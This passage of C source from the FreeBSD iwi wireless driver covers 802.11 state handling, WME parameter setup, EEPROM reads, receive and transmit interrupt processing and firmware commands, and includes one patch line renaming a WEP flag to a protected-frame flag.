* Use that to call iwi_auth_and_assoc. On completing * the join we are then called again with an * AUTH -> RUN transition and we want to do nothing. * This is all totally bogus and needs to be redone. */ iwi_auth_and_assoc(sc, vap); } else if (vap->iv_opmode == IEEE80211_M_MONITOR) ieee80211_runtask(ic, &sc->sc_monitortask); break; case IEEE80211_S_ASSOC: /* * If we are transitioning from AUTH then just wait * for the ASSOC status to come back from the firmware. * Otherwise we need to issue the association request. */ if (vap->iv_state == IEEE80211_S_AUTH) break; iwi_auth_and_assoc(sc, vap); break; default: break; } IWI_UNLOCK(sc); IEEE80211_LOCK(ic); return ivp->iwi_newstate(vap, nstate, arg); } /* * WME parameters coming from IEEE 802.11e specification. These values are * already declared in ieee80211_proto.c, but they are static so they can't * be reused here. */ static const struct wmeParams iwi_wme_cck_params[WME_NUM_AC] = { { 0, 3, 5, 7, 0 }, /* WME_AC_BE */ { 0, 3, 5, 10, 0 }, /* WME_AC_BK */ { 0, 2, 4, 5, 188 }, /* WME_AC_VI */ { 0, 2, 3, 4, 102 } /* WME_AC_VO */ }; static const struct wmeParams iwi_wme_ofdm_params[WME_NUM_AC] = { { 0, 3, 4, 6, 0 }, /* WME_AC_BE */ { 0, 3, 4, 10, 0 }, /* WME_AC_BK */ { 0, 2, 3, 4, 94 }, /* WME_AC_VI */ { 0, 2, 2, 3, 47 } /* WME_AC_VO */ }; #define IWI_EXP2(v) htole16((1 << (v)) - 1) #define IWI_USEC(v) htole16(IEEE80211_TXOP_TO_US(v)) static void iwi_wme_init(struct iwi_softc *sc) { const struct wmeParams *wmep; int ac; memset(sc->wme, 0, sizeof sc->wme); for (ac = 0; ac < WME_NUM_AC; ac++) { /* set WME values for CCK modulation */ wmep = &iwi_wme_cck_params[ac]; sc->wme[1].aifsn[ac] = wmep->wmep_aifsn; sc->wme[1].cwmin[ac] = IWI_EXP2(wmep->wmep_logcwmin); sc->wme[1].cwmax[ac] = IWI_EXP2(wmep->wmep_logcwmax); sc->wme[1].burst[ac] = IWI_USEC(wmep->wmep_txopLimit); sc->wme[1].acm[ac] = wmep->wmep_acm; /* set WME values for OFDM modulation */ wmep = &iwi_wme_ofdm_params[ac]; sc->wme[2].aifsn[ac] = wmep->wmep_aifsn; sc->wme[2].cwmin[ac] = IWI_EXP2(wmep->wmep_logcwmin); sc->wme[2].cwmax[ac] = IWI_EXP2(wmep->wmep_logcwmax); sc->wme[2].burst[ac] = IWI_USEC(wmep->wmep_txopLimit); sc->wme[2].acm[ac] = wmep->wmep_acm; } } static int iwi_wme_setparams(struct iwi_softc *sc, struct ieee80211com *ic) { const struct wmeParams *wmep; int ac; for (ac = 0; ac < WME_NUM_AC; ac++) { /* set WME values for current operating mode */ wmep = &ic->ic_wme.wme_chanParams.cap_wmeParams[ac]; sc->wme[0].aifsn[ac] = wmep->wmep_aifsn; sc->wme[0].cwmin[ac] = IWI_EXP2(wmep->wmep_logcwmin); sc->wme[0].cwmax[ac] = IWI_EXP2(wmep->wmep_logcwmax); sc->wme[0].burst[ac] = IWI_USEC(wmep->wmep_txopLimit); sc->wme[0].acm[ac] = wmep->wmep_acm; } DPRINTF(("Setting WME parameters\n")); return iwi_cmd(sc, IWI_CMD_SET_WME_PARAMS, sc->wme, sizeof sc->wme); } #undef IWI_USEC #undef IWI_EXP2 static void iwi_update_wme(void *arg, int npending) { struct ieee80211com *ic = arg; struct iwi_softc *sc = ic->ic_ifp->if_softc; IWI_LOCK_DECL; IWI_LOCK(sc); (void) iwi_wme_setparams(sc, ic); IWI_UNLOCK(sc); } static int iwi_wme_update(struct ieee80211com *ic) { struct iwi_softc *sc = ic->ic_ifp->if_softc; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); /* * We may be called to update the WME parameters in * the adapter at various places. If we're already * associated then initiate the request immediately; * otherwise we assume the params will get sent down * to the adapter as part of the work iwi_auth_and_assoc * does. 
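/*
 * Editor's note on the tables above: net80211 stores cwmin/cwmax as
 * exponents, while the firmware expects literal window sizes, which is what
 * IWI_EXP2(v) computes as (1 << v) - 1 (the driver additionally converts the
 * result to little endian with htole16()).  exp2_cw() is an illustrative
 * helper, not driver code.
 */
#include <assert.h>
#include <stdint.h>

static uint16_t
exp2_cw(uint8_t logcw)
{
	return ((uint16_t)((1U << logcw) - 1));
}

static void
wme_cw_example(void)
{
	assert(exp2_cw(5) == 31);	/* exponent 5  -> contention window of 31 slots */
	assert(exp2_cw(10) == 1023);	/* exponent 10 -> contention window of 1023 slots */
}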
*/ if (vap->iv_state == IEEE80211_S_RUN) ieee80211_runtask(ic, &sc->sc_wmetask); return (0); } static int iwi_wme_setie(struct iwi_softc *sc) { struct ieee80211_wme_info wme; memset(&wme, 0, sizeof wme); wme.wme_id = IEEE80211_ELEMID_VENDOR; wme.wme_len = sizeof (struct ieee80211_wme_info) - 2; wme.wme_oui[0] = 0x00; wme.wme_oui[1] = 0x50; wme.wme_oui[2] = 0xf2; wme.wme_type = WME_OUI_TYPE; wme.wme_subtype = WME_INFO_OUI_SUBTYPE; wme.wme_version = WME_VERSION; wme.wme_info = 0; DPRINTF(("Setting WME IE (len=%u)\n", wme.wme_len)); return iwi_cmd(sc, IWI_CMD_SET_WMEIE, &wme, sizeof wme); } /* * Read 16 bits at address 'addr' from the serial EEPROM. */ static uint16_t iwi_read_prom_word(struct iwi_softc *sc, uint8_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ IWI_EEPROM_CTL(sc, 0); IWI_EEPROM_CTL(sc, IWI_EEPROM_S); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_C); IWI_EEPROM_CTL(sc, IWI_EEPROM_S); /* write start bit (1) */ IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_D); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_D | IWI_EEPROM_C); /* write READ opcode (10) */ IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_D); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_D | IWI_EEPROM_C); IWI_EEPROM_CTL(sc, IWI_EEPROM_S); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_C); /* write address A7-A0 */ for (n = 7; n >= 0; n--) { IWI_EEPROM_CTL(sc, IWI_EEPROM_S | (((addr >> n) & 1) << IWI_EEPROM_SHIFT_D)); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | (((addr >> n) & 1) << IWI_EEPROM_SHIFT_D) | IWI_EEPROM_C); } IWI_EEPROM_CTL(sc, IWI_EEPROM_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_C); IWI_EEPROM_CTL(sc, IWI_EEPROM_S); tmp = MEM_READ_4(sc, IWI_MEM_EEPROM_CTL); val |= ((tmp & IWI_EEPROM_Q) >> IWI_EEPROM_SHIFT_Q) << n; } IWI_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ IWI_EEPROM_CTL(sc, IWI_EEPROM_S); IWI_EEPROM_CTL(sc, 0); IWI_EEPROM_CTL(sc, IWI_EEPROM_C); return val; } static void iwi_setcurchan(struct iwi_softc *sc, int chan) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; sc->curchan = chan; ieee80211_radiotap_chan_change(ic); } static void iwi_frame_intr(struct iwi_softc *sc, struct iwi_rx_data *data, int i, struct iwi_frame *frame) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mbuf *mnew, *m; struct ieee80211_node *ni; int type, error, framelen; int8_t rssi, nf; IWI_LOCK_DECL; framelen = le16toh(frame->len); if (framelen < IEEE80211_MIN_LEN || framelen > MCLBYTES) { /* * XXX >MCLBYTES is bogus as it means the h/w dma'd * out of bounds; need to figure out how to limit * frame size in the firmware */ /* XXX stat */ DPRINTFN(1, ("drop rx frame len=%u chan=%u rssi=%u rssi_dbm=%u\n", le16toh(frame->len), frame->chan, frame->rssi, frame->rssi_dbm)); return; } DPRINTFN(5, ("received frame len=%u chan=%u rssi=%u rssi_dbm=%u\n", le16toh(frame->len), frame->chan, frame->rssi, frame->rssi_dbm)); if (frame->chan != sc->curchan) iwi_setcurchan(sc, frame->chan); /* * Try to allocate a new mbuf for this ring element and load it before * processing the current mbuf. If the ring element cannot be loaded, * drop the received packet and reuse the old mbuf. In the unlikely * case that the old mbuf can't be reloaded either, explicitly panic. 
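/*
 * Editor's sketch of the receive-buffer policy described in the comment
 * above: a replacement buffer is allocated and DMA-mapped *before* the
 * filled one is handed up, so an allocation failure only drops the current
 * frame and never leaves the ring slot empty.  alloc_buf()/free_buf()/
 * map_buf() are hypothetical stand-ins for m_getcl()/m_freem()/
 * bus_dmamap_load().
 */
#include <stddef.h>

struct rx_slot_sketch {
	void		*buf;		/* cluster currently owned by the ring */
	unsigned long	 paddr;		/* its bus address */
};

extern void	*alloc_buf(void);
extern void	 free_buf(void *);
extern int	 map_buf(void *buf, unsigned long *paddr);

/* Returns the filled buffer to process, or NULL if the frame must be dropped. */
static void *
rx_replenish(struct rx_slot_sketch *slot)
{
	unsigned long paddr;
	void *fresh, *done;

	fresh = alloc_buf();
	if (fresh == NULL)
		return (NULL);			/* keep the old buffer, drop the frame */
	if (map_buf(fresh, &paddr) != 0) {
		free_buf(fresh);
		/* re-map the old buffer; the driver panics if even this fails */
		(void)map_buf(slot->buf, &slot->paddr);
		return (NULL);
	}
	done = slot->buf;			/* hand the filled buffer up the stack */
	slot->buf = fresh;
	slot->paddr = paddr;
	return (done);
}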
*/ mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; return; } bus_dmamap_unload(sc->rxq.data_dmat, data->map); error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(mnew, void *), MCLBYTES, iwi_dma_map_addr, &data->physaddr, 0); if (error != 0) { m_freem(mnew); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(data->m, void *), MCLBYTES, iwi_dma_map_addr, &data->physaddr, 0); if (error != 0) { /* very unlikely that it will fail... */ panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } ifp->if_ierrors++; return; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = data->m; data->m = mnew; CSR_WRITE_4(sc, data->reg, data->physaddr); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = sizeof (struct iwi_hdr) + sizeof (struct iwi_frame) + framelen; m_adj(m, sizeof (struct iwi_hdr) + sizeof (struct iwi_frame)); rssi = frame->rssi_dbm; nf = -95; if (ieee80211_radiotap_active(ic)) { struct iwi_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_antsignal = rssi; tap->wr_antnoise = nf; tap->wr_rate = iwi_cvtrate(frame->rate); tap->wr_antenna = frame->antenna; } IWI_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { type = ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else type = ieee80211_input_all(ic, m, rssi, nf); IWI_LOCK(sc); if (sc->sc_softled) { /* * Blink for any data frame. Otherwise do a * heartbeat-style blink when idle. The latter * is mainly for station mode where we depend on * periodic beacon frames to trigger the poll event. */ if (type == IEEE80211_FC0_TYPE_DATA) { sc->sc_rxrate = frame->rate; iwi_led_event(sc, IWI_LED_RX); } else if (ticks - sc->sc_ledevent >= sc->sc_ledidle) iwi_led_event(sc, IWI_LED_POLL); } } /* * Check for an association response frame to see if QoS * has been negotiated. We parse just enough to figure * out if we're supposed to use QoS. The proper solution * is to pass the frame up so ieee80211_input can do the * work but that's made hard by how things currently are * done in the driver. */ static void iwi_checkforqos(struct ieee80211vap *vap, const struct ieee80211_frame *wh, int len) { #define SUBTYPE(wh) ((wh)->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) const uint8_t *frm, *efrm, *wme; struct ieee80211_node *ni; uint16_t capinfo, status, associd; /* NB: +8 for capinfo, status, associd, and first ie */ if (!(sizeof(*wh)+8 < len && len < IEEE80211_MAX_LEN) || SUBTYPE(wh) != IEEE80211_FC0_SUBTYPE_ASSOC_RESP) return; /* * asresp frame format * [2] capability information * [2] status * [2] association ID * [tlv] supported rates * [tlv] extended supported rates * [tlv] WME */ frm = (const uint8_t *)&wh[1]; efrm = ((const uint8_t *) wh) + len; capinfo = le16toh(*(const uint16_t *)frm); frm += 2; status = le16toh(*(const uint16_t *)frm); frm += 2; associd = le16toh(*(const uint16_t *)frm); frm += 2; wme = NULL; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_VENDOR: if (iswmeoui(frm)) wme = frm; break; } frm += frm[1] + 2; } ni = ieee80211_ref_node(vap->iv_bss); ni->ni_capinfo = capinfo; ni->ni_associd = associd & 0x3fff; if (wme != NULL) ni->ni_flags |= IEEE80211_NODE_QOS; else ni->ni_flags &= ~IEEE80211_NODE_QOS; ieee80211_free_node(ni); #undef SUBTYPE } /* * Task queue callbacks for iwi_notification_intr used to avoid LOR's. 
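/*
 * Editor's sketch of the information-element walk done by iwi_checkforqos()
 * above: past the fixed capinfo/status/associd fields, the frame body is a
 * sequence of {id, length, value} triples, so the cursor advances by
 * frm[1] + 2 on every step and each element is bounds-checked first
 * (cf. the IEEE80211_VERIFY_LENGTH use above).  find_ie() is illustrative
 * only.
 */
#include <stddef.h>
#include <stdint.h>

static const uint8_t *
find_ie(const uint8_t *frm, const uint8_t *efrm, uint8_t id)
{
	while (efrm - frm > 1) {		/* need at least the id and length octets */
		if (frm + 2 + frm[1] > efrm)	/* element would overrun the frame */
			return (NULL);
		if (frm[0] == id)
			return (frm);		/* points at {id, length, value} */
		frm += 2 + frm[1];		/* step to the next element */
	}
	return (NULL);
}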
*/ static void iwi_notification_intr(struct iwi_softc *sc, struct iwi_notif *notif) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct iwi_notif_scan_channel *chan; struct iwi_notif_scan_complete *scan; struct iwi_notif_authentication *auth; struct iwi_notif_association *assoc; struct iwi_notif_beacon_state *beacon; switch (notif->type) { case IWI_NOTIF_TYPE_SCAN_CHANNEL: chan = (struct iwi_notif_scan_channel *)(notif + 1); DPRINTFN(3, ("Scan of channel %u complete (%u)\n", ieee80211_ieee2mhz(chan->nchan, 0), chan->nchan)); /* Reset the timer, the scan is still going */ sc->sc_state_timer = 3; break; case IWI_NOTIF_TYPE_SCAN_COMPLETE: scan = (struct iwi_notif_scan_complete *)(notif + 1); DPRINTFN(2, ("Scan completed (%u, %u)\n", scan->nchan, scan->status)); IWI_STATE_END(sc, IWI_FW_SCANNING); /* * Monitor mode works by doing a passive scan to set * the channel and enable rx. Because we don't want * to abort a scan lest the firmware crash we scan * for a short period of time and automatically restart * the scan when notified the sweep has completed. */ if (vap->iv_opmode == IEEE80211_M_MONITOR) { ieee80211_runtask(ic, &sc->sc_monitortask); break; } if (scan->status == IWI_SCAN_COMPLETED) { /* NB: don't need to defer, net80211 does it for us */ ieee80211_scan_next(vap); } break; case IWI_NOTIF_TYPE_AUTHENTICATION: auth = (struct iwi_notif_authentication *)(notif + 1); switch (auth->state) { case IWI_AUTH_SUCCESS: DPRINTFN(2, ("Authentication succeeeded\n")); ieee80211_new_state(vap, IEEE80211_S_ASSOC, -1); break; case IWI_AUTH_FAIL: /* * These are delivered as an unsolicited deauth * (e.g. due to inactivity) or in response to an * associate request. */ sc->flags &= ~IWI_FLAG_ASSOCIATED; if (vap->iv_state != IEEE80211_S_RUN) { DPRINTFN(2, ("Authentication failed\n")); vap->iv_stats.is_rx_auth_fail++; IWI_STATE_END(sc, IWI_FW_ASSOCIATING); } else { DPRINTFN(2, ("Deauthenticated\n")); vap->iv_stats.is_rx_deauth++; } ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); break; case IWI_AUTH_SENT_1: case IWI_AUTH_RECV_2: case IWI_AUTH_SEQ1_PASS: break; case IWI_AUTH_SEQ1_FAIL: DPRINTFN(2, ("Initial authentication handshake failed; " "you probably need shared key\n")); vap->iv_stats.is_rx_auth_fail++; IWI_STATE_END(sc, IWI_FW_ASSOCIATING); /* XXX retry shared key when in auto */ break; default: device_printf(sc->sc_dev, "unknown authentication state %u\n", auth->state); break; } break; case IWI_NOTIF_TYPE_ASSOCIATION: assoc = (struct iwi_notif_association *)(notif + 1); switch (assoc->state) { case IWI_AUTH_SUCCESS: /* re-association, do nothing */ break; case IWI_ASSOC_SUCCESS: DPRINTFN(2, ("Association succeeded\n")); sc->flags |= IWI_FLAG_ASSOCIATED; IWI_STATE_END(sc, IWI_FW_ASSOCIATING); iwi_checkforqos(vap, (const struct ieee80211_frame *)(assoc+1), le16toh(notif->len) - sizeof(*assoc) - 1); ieee80211_new_state(vap, IEEE80211_S_RUN, -1); break; case IWI_ASSOC_INIT: sc->flags &= ~IWI_FLAG_ASSOCIATED; switch (sc->fw_state) { case IWI_FW_ASSOCIATING: DPRINTFN(2, ("Association failed\n")); IWI_STATE_END(sc, IWI_FW_ASSOCIATING); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); break; case IWI_FW_DISASSOCIATING: DPRINTFN(2, ("Dissassociated\n")); IWI_STATE_END(sc, IWI_FW_DISASSOCIATING); vap->iv_stats.is_rx_disassoc++; ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); break; } break; default: device_printf(sc->sc_dev, "unknown association state %u\n", assoc->state); break; } break; case IWI_NOTIF_TYPE_BEACON: /* XXX check 
struct length */ beacon = (struct iwi_notif_beacon_state *)(notif + 1); DPRINTFN(5, ("Beacon state (%u, %u)\n", beacon->state, le32toh(beacon->number))); if (beacon->state == IWI_BEACON_MISS) { /* * The firmware notifies us of every beacon miss * so we need to track the count against the * configured threshold before notifying the * 802.11 layer. * XXX try to roam, drop assoc only on much higher count */ if (le32toh(beacon->number) >= vap->iv_bmissthreshold) { DPRINTF(("Beacon miss: %u >= %u\n", le32toh(beacon->number), vap->iv_bmissthreshold)); vap->iv_stats.is_beacon_miss++; /* * It's pointless to notify the 802.11 layer * as it'll try to send a probe request (which * we'll discard) and then timeout and drop us * into scan state. Instead tell the firmware * to disassociate and then on completion we'll * kick the state machine to scan. */ ieee80211_runtask(ic, &sc->sc_disassoctask); } } break; case IWI_NOTIF_TYPE_CALIBRATION: case IWI_NOTIF_TYPE_NOISE: case IWI_NOTIF_TYPE_LINK_QUALITY: DPRINTFN(5, ("Notification (%u)\n", notif->type)); break; default: DPRINTF(("unknown notification type %u flags 0x%x len %u\n", notif->type, notif->flags, le16toh(notif->len))); break; } } static void iwi_rx_intr(struct iwi_softc *sc) { struct iwi_rx_data *data; struct iwi_hdr *hdr; uint32_t hw; hw = CSR_READ_4(sc, IWI_CSR_RX_RIDX); for (; sc->rxq.cur != hw;) { data = &sc->rxq.data[sc->rxq.cur]; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); hdr = mtod(data->m, struct iwi_hdr *); switch (hdr->type) { case IWI_HDR_TYPE_FRAME: iwi_frame_intr(sc, data, sc->rxq.cur, (struct iwi_frame *)(hdr + 1)); break; case IWI_HDR_TYPE_NOTIF: iwi_notification_intr(sc, (struct iwi_notif *)(hdr + 1)); break; default: device_printf(sc->sc_dev, "unknown hdr type %u\n", hdr->type); } DPRINTFN(15, ("rx done idx=%u\n", sc->rxq.cur)); sc->rxq.cur = (sc->rxq.cur + 1) % IWI_RX_RING_COUNT; } /* tell the firmware what we have processed */ hw = (hw == 0) ? 
IWI_RX_RING_COUNT - 1 : hw - 1; CSR_WRITE_4(sc, IWI_CSR_RX_WIDX, hw); } static void iwi_tx_intr(struct iwi_softc *sc, struct iwi_tx_ring *txq) { struct ifnet *ifp = sc->sc_ifp; struct iwi_tx_data *data; uint32_t hw; hw = CSR_READ_4(sc, txq->csr_ridx); for (; txq->next != hw;) { data = &txq->data[txq->next]; bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(txq->data_dmat, data->map); if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, 0/*XXX*/); m_freem(data->m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; DPRINTFN(15, ("tx done idx=%u\n", txq->next)); ifp->if_opackets++; txq->queued--; txq->next = (txq->next + 1) % IWI_TX_RING_COUNT; } sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; if (sc->sc_softled) iwi_led_event(sc, IWI_LED_TX); iwi_start_locked(ifp); } static void iwi_fatal_error_intr(struct iwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); device_printf(sc->sc_dev, "firmware error\n"); if (vap != NULL) ieee80211_cancel_scan(vap); ieee80211_runtask(ic, &sc->sc_restarttask); sc->flags &= ~IWI_FLAG_BUSY; sc->sc_busy_timer = 0; wakeup(sc); } static void iwi_radio_off_intr(struct iwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ieee80211_runtask(ic, &sc->sc_radiofftask); } static void iwi_intr(void *arg) { struct iwi_softc *sc = arg; uint32_t r; IWI_LOCK_DECL; IWI_LOCK(sc); if ((r = CSR_READ_4(sc, IWI_CSR_INTR)) == 0 || r == 0xffffffff) { IWI_UNLOCK(sc); return; } /* acknowledge interrupts */ CSR_WRITE_4(sc, IWI_CSR_INTR, r); if (r & IWI_INTR_FATAL_ERROR) { iwi_fatal_error_intr(sc); goto done; } if (r & IWI_INTR_FW_INITED) { if (!(r & (IWI_INTR_FATAL_ERROR | IWI_INTR_PARITY_ERROR))) wakeup(sc); } if (r & IWI_INTR_RADIO_OFF) iwi_radio_off_intr(sc); if (r & IWI_INTR_CMD_DONE) { sc->flags &= ~IWI_FLAG_BUSY; sc->sc_busy_timer = 0; wakeup(sc); } if (r & IWI_INTR_TX1_DONE) iwi_tx_intr(sc, &sc->txq[0]); if (r & IWI_INTR_TX2_DONE) iwi_tx_intr(sc, &sc->txq[1]); if (r & IWI_INTR_TX3_DONE) iwi_tx_intr(sc, &sc->txq[2]); if (r & IWI_INTR_TX4_DONE) iwi_tx_intr(sc, &sc->txq[3]); if (r & IWI_INTR_RX_DONE) iwi_rx_intr(sc); if (r & IWI_INTR_PARITY_ERROR) { /* XXX rate-limit */ device_printf(sc->sc_dev, "parity error\n"); } done: IWI_UNLOCK(sc); } static int iwi_cmd(struct iwi_softc *sc, uint8_t type, void *data, uint8_t len) { struct iwi_cmd_desc *desc; IWI_LOCK_ASSERT(sc); if (sc->flags & IWI_FLAG_BUSY) { device_printf(sc->sc_dev, "%s: cmd %d not sent, busy\n", __func__, type); return EAGAIN; } sc->flags |= IWI_FLAG_BUSY; sc->sc_busy_timer = 2; desc = &sc->cmdq.desc[sc->cmdq.cur]; desc->hdr.type = IWI_HDR_TYPE_COMMAND; desc->hdr.flags = IWI_HDR_FLAG_IRQ; desc->type = type; desc->len = len; memcpy(desc->data, data, len); bus_dmamap_sync(sc->cmdq.desc_dmat, sc->cmdq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(2, ("sending command idx=%u type=%u len=%u\n", sc->cmdq.cur, type, len)); sc->cmdq.cur = (sc->cmdq.cur + 1) % IWI_CMD_RING_COUNT; CSR_WRITE_4(sc, IWI_CSR_CMD_WIDX, sc->cmdq.cur); return msleep(sc, &sc->sc_mtx, 0, "iwicmd", hz); } static void iwi_write_ibssnode(struct iwi_softc *sc, const u_int8_t addr[IEEE80211_ADDR_LEN], int entry) { struct iwi_ibssnode node; /* write node information into NIC memory */ memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.bssid, addr); DPRINTF(("%s mac %6D station %u\n", __func__, node.bssid, ":", entry)); CSR_WRITE_REGION_1(sc, 
IWI_CSR_NODE_BASE + entry * sizeof node, (uint8_t *)&node, sizeof node); } static int iwi_tx_start(struct ifnet *ifp, struct mbuf *m0, struct ieee80211_node *ni, int ac) { struct iwi_softc *sc = ifp->if_softc; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct iwi_node *in = (struct iwi_node *)ni; const struct ieee80211_frame *wh; struct ieee80211_key *k; const struct chanAccParams *cap; struct iwi_tx_ring *txq = &sc->txq[ac]; struct iwi_tx_data *data; struct iwi_tx_desc *desc; struct mbuf *mnew; bus_dma_segment_t segs[IWI_MAX_NSEG]; int error, nsegs, hdrlen, i; int ismcast, flags, xflags, staid; IWI_LOCK_ASSERT(sc); wh = mtod(m0, const struct ieee80211_frame *); /* NB: only data frames use this path */ hdrlen = ieee80211_hdrsize(wh); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); flags = xflags = 0; if (!ismcast) flags |= IWI_DATA_FLAG_NEED_ACK; if (vap->iv_flags & IEEE80211_F_SHPREAMBLE) flags |= IWI_DATA_FLAG_SHPREAMBLE; if (IEEE80211_QOS_HAS_SEQ(wh)) { xflags |= IWI_DATA_XFLAG_QOS; cap = &ic->ic_wme.wme_chanParams; if (!cap->cap_wmeParams[ac].wmep_noackPolicy) flags &= ~IWI_DATA_FLAG_NEED_ACK; } /* * This is only used in IBSS mode where the firmware expects an index * in a h/w table instead of a destination address. */ if (vap->iv_opmode == IEEE80211_M_IBSS) { if (!ismcast) { if (in->in_station == -1) { in->in_station = alloc_unr(sc->sc_unr); if (in->in_station == -1) { /* h/w table is full */ m_freem(m0); ieee80211_free_node(ni); ifp->if_oerrors++; return 0; } iwi_write_ibssnode(sc, ni->ni_macaddr, in->in_station); } staid = in->in_station; } else { /* * Multicast addresses have no associated node * so there will be no station entry. We reserve * entry 0 for one mcast address and use that. * If there are many being used this will be * expensive and we'll need to do a better job * but for now this handles the broadcast case.
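* (Entry 0 is simply rewritten just below whenever the destination multicast address changes.)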
*/ if (!IEEE80211_ADDR_EQ(wh->i_addr1, sc->sc_mcast)) { IEEE80211_ADDR_COPY(sc->sc_mcast, wh->i_addr1); iwi_write_ibssnode(sc, sc->sc_mcast, 0); } staid = 0; } } else staid = 0; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { struct iwi_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; ieee80211_radiotap_tx(vap, m0); } data = &txq->data[txq->cur]; desc = &txq->desc[txq->cur]; /* save and trim IEEE802.11 header */ m_copydata(m0, 0, hdrlen, (caddr_t)&desc->wh); m_adj(m0, hdrlen); error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } } data->m = m0; data->ni = ni; desc->hdr.type = IWI_HDR_TYPE_DATA; desc->hdr.flags = IWI_HDR_FLAG_IRQ; desc->station = staid; desc->cmd = IWI_DATA_CMD_TX; desc->len = htole16(m0->m_pkthdr.len); desc->flags = flags; desc->xflags = xflags; #if 0 if (vap->iv_flags & IEEE80211_F_PRIVACY) desc->wep_txkey = vap->iv_def_txkey; else #endif desc->flags |= IWI_DATA_FLAG_NO_WEP; desc->nseg = htole32(nsegs); for (i = 0; i < nsegs; i++) { desc->seg_addr[i] = htole32(segs[i].ds_addr); desc->seg_len[i] = htole16(segs[i].ds_len); } bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(5, ("sending data frame txq=%u idx=%u len=%u nseg=%u\n", ac, txq->cur, le16toh(desc->len), nsegs)); txq->queued++; txq->cur = (txq->cur + 1) % IWI_TX_RING_COUNT; CSR_WRITE_4(sc, txq->csr_widx, txq->cur); return 0; } static int iwi_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { /* no support; just discard */ m_freem(m); ieee80211_free_node(ni); return 0; } static void iwi_start_locked(struct ifnet *ifp) { struct iwi_softc *sc = ifp->if_softc; struct mbuf *m; struct ieee80211_node *ni; int ac; IWI_LOCK_ASSERT(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ac = M_WME_GETAC(m); if (sc->txq[ac].queued > IWI_TX_RING_COUNT - 8) { /* there is no place left in this ring; tail drop */ /* XXX tail drop */ IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (iwi_tx_start(ifp, m, ni, ac) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } 